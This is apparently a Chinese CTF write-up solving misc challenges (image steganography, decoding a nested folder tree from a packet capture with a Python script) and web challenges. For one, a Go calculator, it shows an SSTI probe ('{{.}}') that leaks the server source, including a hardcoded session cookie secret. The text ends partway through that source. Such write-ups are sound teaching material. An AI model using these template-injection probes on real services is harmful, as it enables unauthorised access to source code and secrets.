Misc 仔细找找 拿到手的图片是一个冬奥会的图片，但是仔细看后面是有很多色点的

文章图片

比如这里就可以看出有一个红色像素点组成的一个V

文章图片

这样我的做法是在ps里面进行调整，然后仔细点看，还是可以看出来的

文章图片

正确的做法是提取非白色像素点，然后再显现出，暂时没有去写脚本，先空着
Strange flag 第六个http包有这么一句话，flag是目录

文章图片

在最后一个http包里面，有这么一个目录结构

`-- New\ folder |-- New\ folder ||-- New\ folder ||-- New\ folder\ (2) ||-- New\ folder\ (3) |`-- New\ folder\ (4) `-- New\ folder\ (2) |-- New\ Folder\ (3) ||-- New\ folder |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(10) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(11) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(12) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(13) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(14) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(15) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(16) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(17) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(18) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(19) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(2) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(20) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(21) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(22) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(23) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(24) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(25) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(26) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(27) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(28) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(29) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(3) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(30) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(31) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(32) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(33) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(34) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(35) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(36) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(37) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(38) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(39) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(4) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(5) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(6) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(7) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(8) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) |`-- New\ folder(9) ||-- New\ folder |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder |`-- New\ folder(2) ||-- New\ folder ||-- New\ folder(2) ||-- New\ folder(3) ||`-- New\ folder |`-- New\ folder(4) |`-- New\ folder |-- New\ folder ||-- New\ folder ||-- New\ folder\ (2) ||-- New\ folder\ (3) ||-- New\ folder\ (4) |`-- New\ folder\ (5) `-- New\ folder\ (2) |-- New\ folder `-- New\ folder\ (2)

猜测做法应该是：有子文件夹的为1，没有子文件夹的为0，转成二进制来
但是顺序有点不太对，按顺序调整以后是这个

`-- New\ folder |-- New\ folder ||-- New\ folder ||-- New\ folder\ (2) ||-- New\ folder\ (3) |`-- New\ folder\ (4) `-- New\ folder\ (2) |-- New\ folder ||-- New\ folder ||-- New\ folder\ (2) ||-- New\ folder\ (3) ||-- New\ folder\ (4) |`-- New\ folder\ (5) `-- New\ folder\ (2) |-- New\ folder `-- New\ folder\ (2) |-- New\ Folder\ (3) ||-- New\ folder |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(2) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(3) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(4) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(5) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(6) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(7) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(8) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) |`-- New\ folder(9) ||-- New\ folder |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder |`-- New\ folder(2) ||-- New\ folder ||-- New\ folder(2) ||-- New\ folder(3) ||`-- New\ folder |`-- New\ folder(4) |`-- New\ folder ||-- New\ folder(10) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(11) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(12) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(13) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(14) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(15) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(16) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(17) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(18) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(19) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(20) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(21) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(22) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(23) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(24) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(25) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(26) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(27) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(28) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(29) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(30) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(31) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(32) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(33) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(34) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(35) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||-- New\ folder(36) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(37) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) |||`-- New\ folder ||`-- New\ folder(4) ||-- New\ folder(38) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) ||`-- New\ folder(2) |||-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder ||-- New\ folder(39) |||-- New\ folder ||||-- New\ folder ||||-- New\ folder(2) ||||`-- New\ folder ||||-- New\ folder(3) ||||`-- New\ folder |||`-- New\ folder(4) |||`-- New\ folder ||`-- New\ folder(2) |||-- New\ folder |||`-- New\ folder |||-- New\ folder(2) |||`-- New\ folder |||-- New\ folder(3) ||`-- New\ folder(4) ||`-- New\ folder

可以发现第六层这里都是四个四个的，而且排版也是占大多数的，比较有规律，所以只提取第四层的数据试试看
写个python脚本

arr1 = [] arr2 = [] with open("1.txt","r") as file: for i in range(596): s = file.readline() if s.find("N") >= 24: arr1.append(s) arr1.append("aaa")for i in range(len(arr1)-1): if arr1[i].find("N") ==24: num1 = arr1[i].find("N") num2 = arr1[i+1].find("N") if num2 > num1: arr2.append(1) else: arr2.append(0)for i in arr2: print(i,end="")

得到

011101100110111001100011011101000110011001111011011001000011001000110011001110010011000000110011001110000011011100111001011001000110011000110101001101110011010100110000001100110011100000110111001110010110001001100011011001000110011000110001011001010110011001100011001100010011010000110001011001100110010101111101

解码得到flag

文章图片

web GameV4.0 data.js里面找到这么一段

文章图片

解码就是flag

文章图片

gocalc0 有一个输入框可以插，计算器，优先考虑是不是ssti，拿个payload去测一下

文章图片

非预期解
解码出来直接就出了

文章图片

预期解
先用{{.}}去获取一个源码

文章图片

package mainimport ( _ "embed" "fmt" "os" "reflect" "strings" "text/template" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gin" "github.com/maja42/goval" )//go:embed template/index.html var tpl string//go:embed main.go var source stringtype Eval struct { E string `json:"e" form:"e" binding:"required"` }func (e Eval) Result() (string, error) { eval := goval.NewEvaluator() result, err := eval.Evaluate(e.E, nil, nil) if err != nil { return "", err } t := reflect.ValueOf(result).Type().Kind() if t == reflect.Int { return fmt.Sprintf("%d", result.(int)), nil } else if t == reflect.String { return result.(string), nil } else { return "", fmt.Errorf("not valid type") } }func (e Eval) String() string { res, err := e.Result() if err != nil { fmt.Println(err) res = "invalid" } return fmt.Sprintf("%s = %s", e.E, res) }func render(c *gin.Context) { session := sessions.Default(c) var his string if session.Get("history") == nil { his = "" } else { his = session.Get("history").(string) } fmt.Println(strings.ReplaceAll(tpl, "{{result}}", his)) t, err := template.New("index").Parse(strings.ReplaceAll(tpl, "{{result}}", his)) if err != nil { fmt.Println(err) c.String(500, "internal error") return } if err := t.Execute(c.Writer, map[string]string{ "s0uR3e": source, }); err != nil { fmt.Println(err) } }func main() { port := os.Getenv("PORT") if port == "" { port = "8080" } r := gin.Default() store := cookie.NewStore([]byte("woW_you-g0t_sourcE_co6e")) r.Use(sessions.Sessions("session", store)) r.GET("/", func(c *gin.Context) { 